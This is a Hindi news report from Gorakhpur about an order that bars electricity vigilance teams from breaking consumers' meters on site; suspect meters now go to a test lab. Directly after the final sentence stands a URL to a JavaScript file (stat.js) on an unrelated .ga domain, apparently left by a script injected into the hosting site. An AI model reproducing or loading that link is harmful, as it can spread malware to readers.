गोरखपुर, ( कुलसूम फात्मा ) बिजली उपभोक्ताओं के लिए खास खबर है अब उपभोक्ताओं के घर में लगे हुए मीटर को अब विजिलेंस या बाकी जांच की टीमें मीटर नहीं तोड़ पाएंगीे जांच टीम शहरी तथा ग्रामीण क्षेत्रों में छापेमारी या फिर जांच अभियान के द्वारा उपभोक्ताओं के घर में जाकर के शक की बिना पर मीटर को तोड़ देती थी और उसकी चेकिंग करती थी। इस पर अब मुख्य अभियंता ने उपभोक्ताओं की शिकायतों पर रोक लगा दी है।

 

 

जी हां, अब विजिलेंस या फिर अन्य जांच की टीमें मौके पर पहुंचकर मीटर नहीं तोड़ेंगे। यदि उनको शक होता है तो मीटर सील करेंगें और टेस्ट सेक्शन के लैब में भेजेगें। सहायक अभियंता की उपस्थित में इस मीटर को तोड़कर जांच करी जाएगी।

असल में पिछले दिनों बिजली इंजीनियर तथा विजिलेंस टीम ने शहरी तथा ग्रामीण एरिया में कांबिंग अभियान तथा छापेमारी की और काफी उपभोक्ताओं के मीटर शंट को शक की बिना पर तोड़ डाला और जांच की। इसमें रजिस्टर्ड दिखा करके बिजली चोरी की जा रही है। मुकदमा भी दर्ज करा दिया।

 

 

 

ग्रामीण तथा शहरी एरिया के 12 से अधिक उपभोक्ताओं ने विजिलेंस टीम की इस क्रिया पर प्रश्न उठा दिया और मुख्य अभियंता से शिकायत भी की, उपभोक्ताओं का कहना था की मीटर टेस्ट सेक्शन के मीटर विशेषज्ञ इंजीनियर की गैरहाजिरी में विजिलेंस टीम तथा बाकी टीम ने शंट के शक पर मीटर को तोड़ा और मीटर में लगे रजिस्टेंट को अलग से लगाने का हम पर आरोप भी लगाया। बिजली चोरी का मुकदमा भी दर्ज करा दिया जिससे के पावर कॉर्पोरेशन की मैनुअल के अनुसार मीटर सेक्शन के सीनियर इंजीनियर के गैरहाजिरी में ही किसी उपभोक्ता के मीटर को चेक किया जा सकेगा।

 

 

जी हां, उपर्युक्त आदेश चीफ इंजीनियर ने उपभोक्ताओं की शिकायत पर किया। और अब बिजली निगम की विजिलेंस टीम तथा शहर के कई एरिया के इंजीनियर की खुदमुख्तारी पर आदेश द्बारा रोक लग गई है।  बता दे के सूरजकुंड क्षेत्र के जूनियर इंजीनियर पर मीटर की जांच के संबंध में उपभोक्ताओं के साथ उत्पीड़न का आरोप भी है।  उपभोक्ताओं ने न्यायालय में बिजली निगम की खुद मुख्तारी की शिकायत की थी

 

 

 

जेई के कार्य से परेशान होने के पश्चात पिछले दिनों एक उपभोक्ता ने जेई को सड़क पर काफी तेजी के साथ दौड़ाकर और पकड़कर पीटा था। उसके पश्चात इंजीनियर की जांच का अभियान कम एकदम से पड़ गया।  आदेश के अनुसार मीटर टेस्ट सेक्शन की गैरमौजूदगी में मीटर को जाचा अब नहीं जा सकता है। जांच टीम या विजिलेंस नहीं कर सकती है। उपभोक्ताओं की शिकायत पर विजिलेंस तथा बाकी जांच टीम के कार्य के ढंग पर रोक लगा दी गई है।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.